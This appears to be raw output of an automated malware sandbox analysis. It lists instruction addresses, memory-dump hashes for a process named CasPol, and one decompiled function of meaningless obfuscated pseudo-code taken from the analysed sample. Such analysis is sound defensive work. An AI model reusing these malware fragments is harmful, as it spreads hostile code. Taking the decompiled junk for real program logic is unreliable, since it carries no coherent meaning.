                                                                0x016febbe
                                                                0x016febbe
                                                                0x016febc3
                                                                0x016febc5
                                                                0x016febcb
                                                                0x016febd2
                                                                0x016febd5
                                                                0x016febdb
                                                                0x016febdf
                                                                0x016febe1
                                                                0x016febf0
                                                                0x016febf9
                                                                0x016fec04
                                                                0x016fec07
                                                                0x016fec0a
                                                                0x016fec82
                                                                0x016fec85
                                                                0x016fec8b
                                                                0x016fec91
                                                                0x016fec93
                                                                0x016fec96
                                                                0x016fec9b
                                                                0x016feca6
                                                                0x016fecac
                                                                0x016fecae
                                                                0x016fecae
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016fec0c
                                                                0x016fec0c
                                                                0x016fec0c
                                                                0x016fec0f
                                                                0x016fec12
                                                                0x016fec15
                                                                0x016fec15
                                                                0x016fec18
                                                                0x016fec1e
                                                                0x00000000
                                                                0x00000000
                                                                0x016fec22
                                                                0x016fec28
                                                                0x016fec4b
                                                                0x016fec5b
                                                                0x016fec5d
                                                                0x016fec63
                                                                0x016fec65
                                                                0x016fec68
                                                                0x016fec6b
                                                                0x016fec6b
                                                                0x016fec70
                                                                0x016fec71
                                                                0x016fec74
                                                                0x016fec7d
                                                                0x00000000
                                                                0x016febe3
                                                                0x016febe3
                                                                0x016febe6
                                                                0x016febe6
                                                                0x016febe7
                                                                0x016febe9
                                                                0x016febec
                                                                0x00000000
                                                                0x016febe6
                                                                0x016febe1
                                                                0x016feba4
                                                                0x016feba9
                                                                0x016febb0
                                                                0x016febb3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016febab
                                                                0x016febab
                                                                0x016febab
                                                                0x016febac
                                                                0x016febac
                                                                0x00000000
                                                                0x016febab
                                                                0x016feb97
                                                                0x016feb19
                                                                0x016feb1c
                                                                0x016feb21
                                                                0x016feb26
                                                                0x016feb2c
                                                                0x016feb2c
                                                                0x00000000
                                                                0x016feb26
                                                                0x016fead6
                                                                0x016fead9
                                                                0x016feadc
                                                                0x016feadc
                                                                0x016feadc
                                                                0x016feade
                                                                0x016feae4
                                                                0x00000000
                                                                0x00000000
                                                                0x016feaee
                                                                0x016feaf7
                                                                0x016feaf9
                                                                0x00000000
                                                                0x00000000
                                                                0x016feb04
                                                                0x016feb12
                                                                0x00000000
                                                                0x016feb12
                                                                0x016feb06
                                                                0x00000000
                                                                0x016feb06
                                                                0x016feaf0
                                                                0x016feaf2
                                                                0x016feaf4
                                                                0x00000000
                                                                0x016feaf4
                                                                0x016fea6a
                                                                0x016fea21
                                                                0x00000000
                                                                0x016fea21
                                                                0x016fe9d6
                                                                0x016fe9d6
                                                                0x016fe9e0
                                                                0x016fe9e2
                                                                0x016fe9e2
                                                                0x016fe9e8
                                                                0x00000000
                                                                0x016fe9e8
                                                                0x016fe987
                                                                0x016fe98f
                                                                0x016fe992
                                                                0x016fe995
                                                                0x016fe995
                                                                0x016fe998
                                                                0x016fe998
                                                                0x016fe99a
                                                                0x016fe9a0
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe9a9
                                                                0x016fe9b2
                                                                0x016fe9b4
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe9ba
                                                                0x016fe9c1
                                                                0x016fe9cf
                                                                0x00000000
                                                                0x016fe9cf
                                                                0x016fe9c3
                                                                0x00000000
                                                                0x016fe9c3
                                                                0x016fe9ab
                                                                0x016fe9ad
                                                                0x016fe9af
                                                                0x00000000
                                                                0x016fe9af
                                                                0x016fe924
                                                                0x016fe8b7
                                                                0x016fe8ba
                                                                0x016fe902
                                                                0x016fe908
                                                                0x016fe90a
                                                                0x00000000
                                                                0x016fe90a
                                                                0x016fe8bc
                                                                0x016fe8bf
                                                                0x016fe8f9
                                                                0x016fe8ff
                                                                0x016fe901
                                                                0x00000000
                                                                0x016fe901
                                                                0x016fe8c1
                                                                0x016fe8c4
                                                                0x016fe8f0
                                                                0x016fe8f6
                                                                0x016fe8f8
                                                                0x00000000
                                                                0x016fe8f8
                                                                0x016fe8c6
                                                                0x016fe8c9
                                                                0x016fe8e7
                                                                0x016fe8ed
                                                                0x016fe8ef
                                                                0x00000000
                                                                0x016fe8ef
                                                                0x016fe8cb
                                                                0x016fe8ce
                                                                0x016fe8de
                                                                0x016fe8e4
                                                                0x016fe8e6
                                                                0x00000000
                                                                0x016fe8e6
                                                                0x016fe8d3
                                                                0x00000000
                                                                0x016fe8d5
                                                                0x016fe8db
                                                                0x016fe8dd
                                                                0x00000000
                                                                0x016fe8dd
                                                                0x016fe853
                                                                0x016fe855
                                                                0x016fe85b
                                                                0x016fe85d
                                                                0x016fe897
                                                                0x016fe89c
                                                                0x016fe8a2
                                                                0x016fe8a6
                                                                0x016fe8ab
                                                                0x016fe8ad
                                                                0x016fe8ad
                                                                0x00000000
                                                                0x016fe85d

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb1f2b4ba4f72d13b6d4239acb00917b397233dffcc41d3d02080e477fc8454a
                                                                • Instruction ID: b6593d10c0e9a4f29bf8d8fef4bcd3cf29791fc86f5145f548aff62175a18afb
                                                                • Opcode Fuzzy Hash: bb1f2b4ba4f72d13b6d4239acb00917b397233dffcc41d3d02080e477fc8454a
                                                                • Instruction Fuzzy Hash: F102A172E006168BCB18CFADCD9167EBFF6AF88200B1A816DD556EB391D735E901CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00421F9F Relevance: .5, Instructions: 489COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 50%
                                                                			E00421F9F(signed int __eax, signed int __ebx, intOrPtr __ecx, signed char __edx, void* __edi, signed int __esi) {
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed char _t58;
				signed int _t60;
				signed int _t61;
				signed int _t64;

				_t60 = __esi;
				_t58 = __edx;
				_t56 = __ecx;
				_t54 = __ebx;
				_t53 = __eax;
				_push(__ebx);
				 *0x5fa31dc0 =  *0x5fa31dc0 - __eax;
				 *0xaba8cea9 =  *0xaba8cea9 - __esi;
				asm("sbb [0x121975ee], ecx");
				_push( *0xfafb31d4);
				if((_t64 |  *0x7e40aafb) < 0) {
					L1:
					asm("sbb [0xc36efb09], edx");
					asm("adc [0x767ba821], ebx");
					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
					_t53 = _t53 & 0x0000000c;
					_t61 = (_t61 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
					asm("sbb ebp, [0x8771e3b]");
					_push(_t61);
					_t60 = _t60 &  *0x912dd0fb;
					_t58 = _t58 & 0x00000020;
					asm("rol byte [0xf89935f2], 0x22");
					asm("rol dword [0xfbe9540d], 0x6c");
					 *0x9459ca0a = _t56;
					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
					asm("adc bl, [0xc320ed3c]");
					asm("scasb");
					_t56 =  *0x9459ca0a - 1;
					 *0xaab74829 =  *0xaab74829 ^ _t53;
					asm("rcl dword [0x7f106817], 0x35");
					asm("adc eax, [0x9d56ea15]");
					_t54 = _t54 +  *0x5ceec7ba &  *0x3b22d9f7;
					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
					goto L1;
				}
				asm("sbb ebp, [0x9a8f6272]");
				__esi = __esi + 1;
				 *0x1862fdd7 =  *0x1862fdd7 >> 0x9c;
				_push( *0xf8b45f6e);
				asm("sbb ebp, [0x196aab0e]");
				__ecx = __ecx | 0xa3a919c8;
				asm("sbb [0x4750a32e], edi");
				__esi = __esi +  *0x4327d1a1;
				__bl = __bl ^  *0x798db3f2;
				 *0x1b0f7423 =  *0x1b0f7423 + __ecx;
				asm("cmpsw");
				_pop(__edx);
				__eax =  *0xd0cd7109;
				__eax =  *0xb9ca4a15;
				__ah = __ah & 0x00000038;
				_pop(__edi);
				asm("stosd");
				asm("adc [0xcd0bb7d9], eax");
				_t10 = __eax;
				__eax =  *0xc5211dd9;
				 *0xc5211dd9 = _t10;
				__esp = __eax;
				__esp = 0x2b4e6c91;
				 *0x888bc184 = __dl;
				_pop(__esp);
				__edx = __edx &  *0x8e681d33;
				asm("rcl dword [0x74e2cd1f], 0x7c");
				asm("sbb eax, [0xe5790765]");
				asm("lodsd");
				__edx = __edx |  *0xd7735ccf;
				 *0x628d0b11 =  *0x628d0b11 << 0x70;
				__ah = __ah + 0xca;
				__ah = __ah ^ 0x0000002a;
				__eax =  *0x109fb7eb;
				 *0x109fb7eb =  *0xc5211dd9;
				__eax =  *0x2a50d527;
				 *0x2a50d527 =  *0x109fb7eb;
				asm("sbb al, [0x7ee59c9]");
				asm("rol dword [0xb17a2a11], 0xdf");
				__ebp = __ebp ^  *0x610e950d;
				__ecx = __ecx - 0x162ce9f5;
				_push( *0xd4e72c97);
				 *0x9e2107b2 =  *0x9e2107b2 & __dl;
				__ebx = __ebx - 1;
				__dh = __dh ^  *0x7a7a3f34;
				_pop(__ebp);
				asm("adc [0x3145ebbd], eax");
				__ebx = __ebx +  *0x264180fa;
				__ebx = __ebx +  *0xa44e9ed4;
				if(__ebx > 0) {
					goto L1;
				}
				 *0x5b37b0ca =  *0x5b37b0ca + __dh;
				 *0xadbbbb8f =  *0xadbbbb8f >> 0x33;
				 *0xfe928ff5 =  *0xfe928ff5 >> 0x28;
				__eax = __eax ^ 0x16a458f8;
				asm("scasb");
				asm("sbb [0x90ed95f6], ah");
				__edi = 0x182c1d1b;
				__edi = __eax;
				__edx = __edx + 0xbb972306;
				asm("adc [0xd765b23c], al");
				_pop( *0x265df819);
				__ebx = __ebx + 1;
				_pop( *0xa54d01a1);
				__edi =  *0xa4fe8203;
				__al = __al - 0x82;
				asm("rcr dword [0xd83298de], 0x32");
				__esi = __esi ^  *0xd0cd7167;
				__edx =  *0x73b7c91d;
				 *0xaad21cb7 = __ah;
				__ebx = __ebx |  *0x51230fed;
				asm("sbb cl, 0x82");
				__esp = 0x2b4e6c91 ^  *0xe0fb2a31;
				__eax = __eax +  *0xc7cb36e;
				asm("ror byte [0x3047ce12], 0x4c");
				 *0x650ee89b =  *0x650ee89b - __ecx;
				 *0xdcfc7c19 =  *0xdcfc7c19 ^ 0x2b4e6c91;
				__ecx = __ecx |  *0x5b1b0d31;
				__ecx = __ecx - 0xbdbf9096;
				 *0x1d9fdbdf =  *0x1d9fdbdf >> 0xc;
				__esi = __esi &  *0x231b6cc0;
				__edx =  *0x73b7c91d &  *0x7139aadc;
				__ebx = __ebx -  *0xf811d0cd;
				 *0x6418c7a0 =  *0x6418c7a0 | __dh;
				asm("adc al, 0x28");
				__edi =  *0x564e3a8f;
				 *0x564e3a8f =  *0xa4fe8203;
				__ecx = __ecx -  *0xa0d78b13;
				__ebp = __ebp | 0x1907ee68;
				__edi =  *0xad110d69 * 0x3103;
				__esi = __esi - 1;
				 *0xd787c0ca =  *0xd787c0ca & __dl;
				__ebp = __ebp - 1;
				 *0x2d517d05 =  *0x2d517d05 ^ __eax;
				__ecx = __ecx + 1;
				asm("rcl dword [0xd0cd7109], 0x9b");
				__ebp = __ebp &  *0x1b4de019;
				asm("lodsd");
				asm("adc edx, [0xea9304ef]");
				asm("sbb [0xf75fccf0], ebx");
				L1();
				asm("adc [0xcd27f634], bh");
				 *0xf6c311d0 =  *0xf6c311d0 ^ __dl;
				asm("lodsd");
				 *0x50701dff =  *0x50701dff - 0x2b4e6c91;
				if( *0x50701dff >= 0) {
					goto L1;
				}
				__esi =  *0xe8f0da7d * 0x120c;
				 *0x7ee92d1 = __edx;
				asm("adc [0x4ab62e15], edx");
				asm("sbb eax, 0x2c637e8f");
				_pop(__esp);
				__eax = __eax - 0x97c12fb8;
				__ebx = __ebx - 1;
				asm("adc esp, 0xc2cb961f");
				 *0xc3d5501d =  *0xc3d5501d >> 0x7e;
				__ecx = __ecx - 1;
				_pop(__esp);
				__bh = __bh | 0x00000032;
				asm("adc ebx, [0xcbe77dfb]");
				__esi =  *0xe8f0da7d * 0x0000120c ^  *0x5f188f61;
				__ebp = __ebp + 0x3973a6fb;
				asm("ror dword [0xf2b13499], 0xff");
				__al = __al ^  *0x19d765b2;
				_t20 = __edx;
				__edx =  *0x352fc315;
				 *0x352fc315 = _t20;
				asm("sbb eax, [0xec9959dd]");
				__eax = __eax - 1;
				asm("adc edi, 0x752acd23");
				_pop(__ecx);
				asm("sbb ebp, [0x1847571d]");
				__dh =  *0xad3f348a;
				__edi = __edi +  *0xb965bdee;
				asm("cmpsb");
				__ebp = __ebp -  *0xffdb760e;
				__ecx = __ecx +  *0xf346d9d6;
				__eax =  *0xa64348f0;
				if(( *0x7cd2fe33 & __edx) != 0) {
					goto L1;
				}
				_pop( *0x109f87b);
				__edx = __edx &  *0x1b50520d;
				__ebx = __ebx & 0xb1be2715;
				asm("adc esp, [0x9db44bdd]");
				__edx = __edx | 0x845a5701;
				__edx = __edx |  *0x28af96d1;
				__ebp =  *0xcd1b8903;
				__ebx = __ebx &  *0x46dd1dd9;
				__esp = __eax;
				__eax = 0xb51c4bf5;
				__edi = 0x55165809;
				 *0x696dc7fa =  *0x696dc7fa - __edx;
				_t25 = __ebx;
				__ebx =  *0x9b79bff3;
				 *0x9b79bff3 = _t25;
				if( *0x696dc7fa >= 0) {
					goto L1;
				}
				 *0xb2221573 =  *0xb2221573 >> 0x5a;
				__esi = __esi & 0xb321d765;
				 *0x5410bb83 =  *0x5410bb83 & __ecx;
				 *0x9f4a98e1 =  *0x9f4a98e1 >> 0xad;
				__edi = 0x55165809 &  *0x5ab47033;
				if(0x55165809 < 0) {
					goto L1;
				}
				__ecx =  *0x3029687c * 0xb976;
				__edi = __edi +  *0xc34df168;
				__ah = __ah ^  *0x19cba588;
				_push(0xb51c4bf5);
				asm("scasb");
				__ebp = __ebp & 0xe0bac5f7;
				__ebp = __ebp |  *0xbf1113ea;
				__edi = __edi - 1;
				 *0x3d4ac2f8 =  *0x3d4ac2f8 >> 0x98;
				asm("adc dh, [0xcd71092a]");
				 *0x2e2115d0 =  *0x2e2115d0 ^ __dh;
				asm("stosb");
				 *0x4c5179f6 =  *0x4c5179f6 << 0x3c;
				__ebx = __ebx ^ 0xcaedaa85;
				asm("adc ebx, [0x77a9c361]");
				__edi =  *0x7ba8fa9a;
				if(__ebx == 0) {
					goto L1;
				}
				__eax = 0xb51c4bf5 ^  *0x1611d974;
				 *0x1184f4fe =  *0x1184f4fe + __ebp;
				 *0xc1fcc9c =  *0xc1fcc9c - __ecx;
				 *0x12171589 =  *0x12171589 + 0x2b4e6c91;
				_t30 = __al;
				__al =  *0x7ee64e4;
				 *0x7ee64e4 = _t30;
				__ecx = __ecx - 0x6f7a8d11;
				 *0xf2618718 =  *0xf2618718 << 0x79;
				 *0x6cd10930 = __ah;
				 *0x9f7d091c =  *0x9f7d091c >> 0x9a;
				__bh = 0xe0;
				__edi = __edi ^ 0x03515bc4;
				_pop( *0x981f21ce);
				 *0x3749136d = __esi;
				if(__edi >= 0) {
					goto L1;
				}
				__esp = __esp &  *0x11d0cd71;
				__ecx = __ecx +  *0x26d7f02e;
				__edi =  *0xcf9d096a * 0xd03;
				asm("adc edx, [0x25079223]");
				asm("ror dword [0x676d6de], 0xf2");
				asm("cmpsw");
				 *0x885b0f27 = __edi;
				 *0x8101c1b3 =  *0x8101c1b3 & __dl;
				asm("sbb bl, 0x8");
				__edx = __edx | 0xd8ff41cd;
				__eax = 0x7180bc35;
				if(0x2b4e6c91 >  *0xd1a67f1f) {
					goto L1;
				}
				__ch = __ch ^ 0x000000ca;
				 *0x8f60f463 =  *0x8f60f463 << 0xe3;
				 *0xf8291562 =  *0xf8291562 >> 0xc;
				 *0x5e6673fa =  *0x5e6673fa >> 0x48;
				asm("rcl dword [0xe5cb9994], 0x4d");
				_t35 = __ebp;
				__ebp =  *0xac103c94;
				 *0xac103c94 = _t35;
				if( *0xf8291562 != 0) {
					goto L1;
				}
				__esi = __esi ^ 0x7a81f67b;
				asm("ror dword [0x1dd9506f], 0x88");
				__edi = __edi + 1;
				__eax = __eax & 0xd8512d2f;
				__ebp = __ebp +  *0x8d3810c4;
				__ebx = 0xba024d94;
				_push(__esi);
				_push( *0x52ad0319);
				_t36 = __edi;
				__edi =  *0x158ce20d;
				 *0x158ce20d = _t36;
				__edi =  *0xf212a26b * 0x65b2;
				__ecx = __ecx ^  *0x49287f0d;
				asm("scasb");
				if(__ecx > 0) {
					goto L1;
				}
				asm("sbb ebx, [0x46a8af77]");
				 *0x20e4e67 = __edi;
				_pop(__esp);
				 *0xaa1a4211 = __edi;
				__ecx = __ecx +  *0xee0c89d5;
				__esi =  *0x72d466fd;
				__esi =  *0x72d466fd | 0xee8e7cc5;
				asm("rol dword [0x216f0bcd], 0x61");
				L1();
				 *0xae2324e8 =  *0xae2324e8 << 0x32;
				asm("sbb bh, 0x63");
				asm("sbb ecx, [0x4c8517ce]");
				if( *0xae2324e8 <= 0) {
					goto L1;
				}
				__edi = __edi | 0x02413476;
				asm("rcr dword [0x5821d992], 0x8b");
				 *0x6cf9565 =  *0x6cf9565 & 0xba024d94;
				_pop( *0x3d11c52f);
				__bh = 0x000000e0 |  *0x98466a0;
				asm("sbb eax, 0xbd18a5a9");
				__eax = 0x7381bc25;
				_pop(__edi);
				__cl = __cl &  *0x11e0fdb1;
				_pop(__ebx);
				_push(0x7381bc25);
				 *0x87f1111b =  *0x87f1111b - 0x7381bc25;
				asm("ror byte [0xfa810cb3], 0xed");
				 *0xe44f6bf4 =  *0xe44f6bf4 << 0xb9;
				__edi = __edi + 1;
				__ecx = __ecx | 0xa4f67792;
				 *0x302507c8 =  *0x302507c8 << 0x55;
				asm("lodsd");
				asm("cmpsb");
				asm("sbb ch, 0x38");
				__ebx = 0xffffffffba024d93;
				asm("sbb ch, 0xc9");
				 *0x7382de91 =  *0x7382de91 ^ __esi;
				__ebx = 0xffffffffba024d92;
				 *0xc987b321 =  *0xc987b321 << 0xae;
				__ecx =  *0xeda0ba6b * 0x3054;
				asm("sbb edx, [0x226d1283]");
				 *0x628f6064 =  *0x628f6064 << 0xce;
				asm("adc edx, [0xbed5fb15]");
				__eax = 0x7381bc24;
				asm("sbb ebp, 0x16ecc6d5");
				_push(__edx);
				__edx = __edx - 0xb79bec35;
				__ecx =  *0x6fc32d69 * 0xcdad;
				_push(0x7381bc25);
				__ecx =  *0xf6ad15d9;
				asm("cmpsw");
				 *0xa8faa8ce =  *0xa8faa8ce | __edi;
				asm("ror dword [0xd319132f], 0x3d");
				__edx = __edx & 0xe0a58739;
				asm("adc edx, 0xcd0bbefe");
				_push(0x7381bc25);
				__esp = __esp +  *0xb40d15d9;
				asm("rcl dword [0x5ae1e665], 0x5d");
				__edx = __edx -  *0xfb0bbb9a;
				__edi = __edi +  *0xf1fbb431;
				if(__edi < 0) {
					goto L1;
				}
				0xffffffffba024d92 ^  *0x1dd99c26 = 0xba506ad9;
				__eax =  *0x4713d703;
				asm("rol dword [0x976b5f6c], 0xf3");
				 *0xdf942581 =  *0xdf942581 << 0x32;
				asm("lodsb");
				__al = __al +  *0xbc030e2c;
				_pop(__ebx);
				 *0xc28f2735 =  *0xc28f2735 + 0x2b4e6c91;
				asm("scasd");
				asm("rol dword [0x6111d765], 0x97");
				 *0xc464ff37 =  *0xc464ff37 - __edi;
				 *0x1003bfe1 =  *0x1003bfe1 ^ __al;
				 *0x9f62d414 =  *0x9f62d414 >> 0x1d;
				__eax = 0x7ee64ee;
				 *0x2c6e901d =  *0x2c6e901d | __ecx;
				if( *0x2c6e901d != 0) {
					goto L1;
				}
				asm("rol dword [0xc3d1ca7a], 0x41");
				 *0xdd044e2c =  *0xdd044e2c << 0x94;
				asm("movsb");
				__esi = 0xba506ad9;
				if( *0xdd044e2c >= 0) {
					goto L1;
				}
				 *0x5872c771 =  *0x5872c771 | __esi;
				__edx = __edx - 1;
				asm("rcl dword [0x9fe4e29], 0xcb");
				__esp = __esp + 1;
				asm("sbb [0x6e5ae985], esi");
				__dl = __dl & 0x000000d7;
				asm("ror dword [0xd38c2511], 0xc");
				if(__dl < 0) {
					goto L1;
				}
				 *0xe7ec9870 =  *0xe7ec9870 ^ __edi;
				 *0x6a897a38 =  *0x6a897a38 + __cl;
				__edx =  *0xb881defa;
				 *0x191507ee =  *0x191507ee >> 0x26;
				__ebp =  *0x2589eff1;
				asm("sbb edx, 0xd046209");
				__ebx = 0xfffffffffadaefdf;
				 *0xa1da84d4 =  *0xa1da84d4 & __esi;
				_t39 = __edi;
				__edi =  *0xd950cd0b;
				 *0xd950cd0b = _t39;
				__edi =  *0x902fcb1d;
				 *0x902fcb1d =  *0xd950cd0b;
				asm("scasb");
				_t41 = __esp;
				__esp =  *0xf3c38e91;
				 *0xf3c38e91 = _t41;
				 *0x124e5e04 =  *0x124e5e04 >> 0x7a;
				__edi =  *0x186e5681;
				 *0x186e5681 =  *0x902fcb1d;
				asm("sbb al, [0x1f50cdc9]");
				asm("sbb edi, [0x892f2389]");
				 *0x588a1dd7 =  *0x588a1dd7 << 0xd5;
				 *0x15c8e199 =  *0x15c8e199 + __ecx;
				__ch = __ch +  *0x60350bd0;
				 *0xe834982c =  *0xe834982c >> 0xda;
				asm("cmpsb");
				__edi =  *0x186e5681 +  *0x437677de;
				asm("sbb ebx, 0xf762d403");
				__esi =  *0xb20cc76a * 0xd765;
				 *0x2182d50e =  *0x2182d50e << 0x2c;
				_pop(__eax);
				__ebx = 0x3778a45;
				asm("sbb al, [0x4817d20a]");
				__bl = __bl -  *0x897665c9;
				if(__bl >= 0) {
					goto L1;
				}
				asm("sbb ecx, 0xc9d34673");
				__ebx = 0x2363a550;
				_t51 = __ecx;
				__ecx =  *0x716f2a65;
				 *0x716f2a65 = _t51;
				if(0xba506ad9 >= 0) {
					goto L1;
				}
				 *0x706ddf79 =  *0x706ddf79 << 0x90;
				_push( *0x378b0d05);
				__edi = __edi -  *0x95e2063f;
				 *0x680211d9 = 0x7ee64ee;
				__bl = __bl ^ 0x0000003a;
				 *0x35cc929b =  *0x35cc929b | __edi;
				__edx = __edx |  *0x7cd79681;
				_t52 = __ecx;
				__ecx =  *0xf39fca26;
				 *0xf39fca26 = _t52;
				__ebp = __ebp ^  *0x93fc1907;
				 *0xbee10567 =  *0xbee10567 & __esi;
				asm("adc [0x95d8d09b], esi");
				__edx = __ebp;
				__ch =  *0x2efe0bb2;
				_pop( *0xd525176c);
				__eax = 0x7ee64ee +  *0x71098ec4;
				asm("adc edi, [0xc715d0cd]");
				asm("adc [0x9afc8c2e], eax");
				__eax = 0x7ee64ee +  *0x71098ec4 + 1;
				 *0x7d9b68e1 =  *0x7d9b68e1 - 0xe0;
				_push(0x7ee64ee);
				 *0xdf6c4fa2 =  *0xdf6c4fa2 - __bl;
				__ebx = 0x2363a550 -  *0xb07c9ceb;
				_push(0x7ee64ee);
				__ebp = __ebp + 0xff0115d9;
				asm("adc edx, [0x950257ce]");
				 *0x93c08520 =  *0x93c08520 >> 0x52;
				 *0xee64300d =  *0xee64300d + __edx;
				__edx = __edx - 1;
				__ecx =  *0xf39fca26 |  *0xcd1d8e95;
				_push(0x7ee64ee);
				__ebp = __ebp ^  *0xbe8cd94;
				asm("stosd");
				_push( *0x3f32efd8);
				if(__ebp <= 0) {
					goto L1;
				}
				asm("adc esp, 0xa652c176");
				asm("rcl dword [0x95b9af39], 0x7d");
				_pop(__edi);
				 *0xcd713763 =  *0xcd713763 ^ __al;
				__dh = __dh + 0xd0;
				__edx = __edx -  *0xe4158615;
				__esp = __esp + 1;
				_pop(__ebx);
				asm("stosb");
				asm("adc ah, 0x12");
				asm("sbb [0x535018b1], cl");
				__ecx = __ecx -  *0x112e21c0;
				_push(0x201dd99b);
				 *0xa9b689d1 = __edx;
				 *0xba1998a2 =  *0xba1998a2 + __bh;
				 *0x5fa21826 =  *0x5fa21826 >> 0xd7;
				__eax = __eax & 0x0c36e507;
				__edx =  *0x2d1e8569 * 0xb23c;
				 *0x116cce38 =  *0x116cce38 & __bl;
				asm("rcr byte [0x4d2cc412], 0x9b");
				__ecx = __ecx + 1;
				__ebx = __ebx &  *0x994419be;
				asm("adc ecx, 0x7f18d09");
				asm("ror dword [0x31624b9b], 0xcc");
				__esp = 0x19d0cd68;
				 *0xc870bfc1 =  *0xc870bfc1 << 0xf3;
				if(__edi == 0) {
					goto L1;
				}
				asm("rcl dword [0x4b0ac74], 0x53");
				__esp = 0x19d0cd69;
				return __eax;
			}










                                                                0x00421f9f
                                                                0x00421f9f
                                                                0x00421f9f
                                                                0x00421f9f
                                                                0x00421f9f
                                                                0x00421f9f
                                                                0x00421fa0
                                                                0x00421fa6
                                                                0x00421fac
                                                                0x00421fb8
                                                                0x00421fbe
                                                                0x0042177d
                                                                0x0042177d
                                                                0x00421783
                                                                0x00421789
                                                                0x004217a2
                                                                0x004217a5
                                                                0x004217ab
                                                                0x004217b2
                                                                0x004217b8
                                                                0x004217b9
                                                                0x004217c5
                                                                0x004217c8
                                                                0x004217cf
                                                                0x004217d6
                                                                0x004217dc
                                                                0x004217e9
                                                                0x004217f9
                                                                0x004217fa
                                                                0x004217fb
                                                                0x00421801
                                                                0x00421808
                                                                0x0042180e
                                                                0x00421814
                                                                0x00000000
                                                                0x00421814
                                                                0x00421fc4
                                                                0x00421fca
                                                                0x00421fcb
                                                                0x00421fd2
                                                                0x00421fd8
                                                                0x00421fde
                                                                0x00421fe4
                                                                0x00421fea
                                                                0x00421ff0
                                                                0x00421ff6
                                                                0x00421fff
                                                                0x00422001
                                                                0x00422002
                                                                0x00422007
                                                                0x0042200c
                                                                0x00422010
                                                                0x00422011
                                                                0x0042201e
                                                                0x00422025
                                                                0x00422025
                                                                0x00422025
                                                                0x0042202b
                                                                0x0042202c
                                                                0x00422031
                                                                0x00422037
                                                                0x00422038
                                                                0x0042203e
                                                                0x00422045
                                                                0x0042204b
                                                                0x0042204c
                                                                0x00422052
                                                                0x00422059
                                                                0x0042205c
                                                                0x0042205f
                                                                0x0042205f
                                                                0x00422065
                                                                0x00422065
                                                                0x0042206b
                                                                0x00422071
                                                                0x00422078
                                                                0x0042207e
                                                                0x00422084
                                                                0x0042208a
                                                                0x00422090
                                                                0x00422091
                                                                0x00422097
                                                                0x00422098
                                                                0x004220a4
                                                                0x004220aa
                                                                0x004220b0
                                                                0x00000000
                                                                0x00000000
                                                                0x004220bb
                                                                0x004220c7
                                                                0x004220ce
                                                                0x004220d5
                                                                0x004220da
                                                                0x004220db
                                                                0x004220e1
                                                                0x004220e2
                                                                0x004220e3
                                                                0x004220e9
                                                                0x004220ef
                                                                0x004220f5
                                                                0x004220f6
                                                                0x00422101
                                                                0x00422107
                                                                0x00422109
                                                                0x00422110
                                                                0x00422116
                                                                0x0042211c
                                                                0x00422122
                                                                0x00422128
                                                                0x0042212b
                                                                0x00422131
                                                                0x00422137
                                                                0x0042213e
                                                                0x00422147
                                                                0x0042214d
                                                                0x00422153
                                                                0x00422159
                                                                0x00422160
                                                                0x00422166
                                                                0x0042216c
                                                                0x00422172
                                                                0x00422178
                                                                0x0042217a
                                                                0x0042217a
                                                                0x00422180
                                                                0x00422186
                                                                0x0042218c
                                                                0x00422196
                                                                0x0042219d
                                                                0x004221a3
                                                                0x004221a4
                                                                0x004221aa
                                                                0x004221ab
                                                                0x004221b2
                                                                0x004221be
                                                                0x004221bf
                                                                0x004221c5
                                                                0x004221cb
                                                                0x004221d6
                                                                0x004221dc
                                                                0x004221e2
                                                                0x004221e3
                                                                0x004221e9
                                                                0x00000000
                                                                0x00000000
                                                                0x004221ef
                                                                0x004221f9
                                                                0x004221ff
                                                                0x00422205
                                                                0x0042220a
                                                                0x0042220b
                                                                0x00422210
                                                                0x00422211
                                                                0x0042221d
                                                                0x0042222a
                                                                0x0042222b
                                                                0x0042222c
                                                                0x0042222f
                                                                0x00422235
                                                                0x0042223b
                                                                0x00422241
                                                                0x00422248
                                                                0x0042224e
                                                                0x0042224e
                                                                0x0042224e
                                                                0x00422254
                                                                0x0042225a
                                                                0x0042225b
                                                                0x00422261
                                                                0x00422262
                                                                0x00422268
                                                                0x00422274
                                                                0x0042227a
                                                                0x0042227b
                                                                0x00422281
                                                                0x00422293
                                                                0x00422298
                                                                0x00000000
                                                                0x00000000
                                                                0x0042229e
                                                                0x004222a4
                                                                0x004222aa
                                                                0x004222b0
                                                                0x004222b6
                                                                0x004222bc
                                                                0x004222c2
                                                                0x004222c9
                                                                0x004222d5
                                                                0x004222d6
                                                                0x004222db
                                                                0x004222e1
                                                                0x004222e7
                                                                0x004222e7
                                                                0x004222e7
                                                                0x004222ed
                                                                0x00000000
                                                                0x00000000
                                                                0x004222f3
                                                                0x004222fa
                                                                0x00422300
                                                                0x0042230c
                                                                0x00422313
                                                                0x00422319
                                                                0x00000000
                                                                0x00000000
                                                                0x0042231f
                                                                0x00422329
                                                                0x0042232f
                                                                0x00422335
                                                                0x0042233c
                                                                0x0042233d
                                                                0x00422343
                                                                0x00422349
                                                                0x00422350
                                                                0x00422357
                                                                0x0042235d
                                                                0x00422363
                                                                0x00422364
                                                                0x0042236b
                                                                0x00422371
                                                                0x00422377
                                                                0x0042237d
                                                                0x00000000
                                                                0x00000000
                                                                0x00422383
                                                                0x00422389
                                                                0x0042238f
                                                                0x00422395
                                                                0x0042239b
                                                                0x0042239b
                                                                0x0042239b
                                                                0x004223a1
                                                                0x004223ad
                                                                0x004223b4
                                                                0x004223c0
                                                                0x004223cd
                                                                0x004223cf
